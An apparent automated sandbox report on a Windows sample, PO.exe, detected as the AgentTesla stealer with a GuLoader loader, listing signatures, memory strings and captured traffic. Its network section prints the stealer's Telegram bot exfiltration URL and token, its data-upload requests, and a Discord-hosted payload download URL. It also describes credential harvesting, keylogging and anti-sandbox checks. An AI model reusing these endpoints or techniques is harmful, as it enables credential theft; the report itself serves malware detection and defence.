Windows Analysis Report
PO.exe

Overview

General Information

Sample Name: PO.exe
Analysis ID: 756266
MD5: 9297126fd9624f7dc2d4f64f072668a2
SHA1: c30b3c8fddd49f7dfba687026daf6293f6d90b1b
SHA256: edd8e1858bcc704fdea75837bb448eceda61317e7f8028e82aa2a0e5559c658a
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

barindex
Source: PO.exe Virustotal: Detection: 29% Perma Link
Source: PO.exe ReversingLabs: Detection: 26%
Source: CasPol.exe.7240.4.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "561616954", "Chat URL": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument"}
Source: CasPol.exe.7240.4.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendMessage"}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010DD808 CryptUnprotectData, 4_2_010DD808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010DDEF0 CryptUnprotectData, 4_2_010DDEF0
Source: PO.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\PO.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\One Jump to behavior
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49854 version: TLS 1.2
Source: PO.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_0040596F
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_004064C1 FindFirstFileW,FindClose, 1_2_004064C1
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_004027FB FindFirstFileW, 1_2_004027FB

Networking

barindex
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49854 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad25c20e8b8dfHost: api.telegram.orgContent-Length: 999Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad25c2ca67aceHost: api.telegram.orgContent-Length: 21528Expect: 100-continue
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 162.159.133.233 162.159.133.233
Source: Joe Sandbox View IP Address: 162.159.133.233 162.159.133.233
Source: global traffic HTTP traffic detected: GET /attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000004.00000002.89346370502.000000001DDA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 00000004.00000003.86340018468.00000000222CC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89340222421.000000001D9FA000.00000004.00000800.00020000.00000000.sdmp, Cookies.4.dr String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: Cookies.4.dr String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 00000004.00000002.89339798750.000000001D9D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bLCeYs.com
Source: CasPol.exe, 00000004.00000002.89318154724.0000000001563000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.85166822571.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000004.00000002.89318154724.0000000001563000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.85166822571.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: PO.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89340758768.000000001DA29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocumentdocument-----
Source: CasPol.exe, 00000004.00000002.89316980207.00000000014CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: CasPol.exe, 00000004.00000002.89334284519.000000001C8F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocx
Source: CasPol.exe, 00000004.00000002.89317391968.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxT
Source: CasPol.exe, 00000004.00000002.89317391968.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxt
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/8
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89339798750.000000001D9D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sFTel9k7EYFPshk.com
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sFTel9k7EYFPshk.comt-Wl
Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown HTTP traffic detected: POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad25c20e8b8dfHost: api.telegram.orgContent-Length: 999Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49854 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_1C7E1010 SetWindowsHookExW 0000000D,00000000,?,? 4_2_1C7E1010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_0040541C

System Summary

barindex
Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: PO.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004033B6
Source: C:\Users\user\Desktop\PO.exe File created: C:\Windows\Handskedukker.ini Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00406846 1_2_00406846
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00404C59 1_2_00404C59
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A6D32 1_2_032A6D32
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0733 1_2_032A0733
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032C5308 1_2_032C5308
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A7F0D 1_2_032A7F0D
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A6313 1_2_032A6313
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0911 1_2_032A0911
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A6B6B 1_2_032A6B6B
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A7F4C 1_2_032A7F4C
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0545 1_2_032A0545
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032C5559 1_2_032C5559
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A05A1 1_2_032A05A1
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A65B9 1_2_032A65B9
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A6B86 1_2_032A6B86
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0784 1_2_032A0784
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032BAD9A 1_2_032BAD9A
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A09EE 1_2_032A09EE
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A05F0 1_2_032A05F0
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A6BC8 1_2_032A6BC8
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A67C1 1_2_032A67C1
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A07C7 1_2_032A07C7
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A802A 1_2_032A802A
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0620 1_2_032A0620
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0A26 1_2_032A0A26
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A6C05 1_2_032A6C05
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A081A 1_2_032A081A
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0670 1_2_032A0670
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A6C4E 1_2_032A6C4E
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A6243 1_2_032A6243
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032AB2AB 1_2_032AB2AB
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0AA9 1_2_032A0AA9
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A06AC 1_2_032A06AC
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A08BF 1_2_032A08BF
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032C648B 1_2_032C648B
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A6C91 1_2_032A6C91
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A1CEB 1_2_032A1CEB
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A06E2 1_2_032A06E2
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A70E7 1_2_032A70E7
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A0AFB 1_2_032A0AFB
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032C40FA 1_2_032C40FA
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A04F2 1_2_032A04F2
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A70C0 1_2_032A70C0
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032A1CDE 1_2_032A1CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01044320 4_2_01044320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01043A50 4_2_01043A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01043708 4_2_01043708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010B6968 4_2_010B6968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010BC318 4_2_010BC318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010B5A08 4_2_010B5A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010B9708 4_2_010B9708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010BC1C8 4_2_010BC1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010B81F8 4_2_010B81F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010BBAC8 4_2_010BBAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010B3EA0 4_2_010B3EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010D0040 4_2_010D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010D90BE 4_2_010D90BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010D634C 4_2_010D634C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010DAA70 4_2_010DAA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010D4DD8 4_2_010D4DD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010D5F70 4_2_010D5F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010DF600 4_2_010DF600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010D0032 4_2_010D0032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010DB3D2 4_2_010DB3D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_010D46C0 4_2_010D46C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01136829 4_2_01136829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_0146B439 4_2_0146B439
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01462768 4_2_01462768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01461FF0 4_2_01461FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_0146DE78 4_2_0146DE78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01461AC1 4_2_01461AC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_1C7EE9E0 4_2_1C7EE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_1C7E6C88 4_2_1C7E6C88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_1C7E83C8 4_2_1C7E83C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_1D6C5E08 4_2_1D6C5E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_1D6C46C4 4_2_1D6C46C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_1D6C5D20 4_2_1D6C5D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_1D6C6AF1 4_2_1D6C6AF1
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_032C63F1 NtProtectVirtualMemory, 1_2_032C63F1
Source: C:\Users\user\Desktop\PO.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: PO.exe Virustotal: Detection: 29%
Source: PO.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\PO.exe File read: C:\Users\user\Desktop\PO.exe Jump to behavior
Source: PO.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PO.exe C:\Users\user\Desktop\PO.exe
Source: C:\Users\user\Desktop\PO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\PO.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\PO.exe Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_004033B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\PO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes Jump to behavior
Source: C:\Users\user\Desktop\PO.exe File created: C:\Users\user\AppData\Local\Temp\nsw9704.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/7@2/2
Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00402095 CoCreateInstance, 1_2_00402095
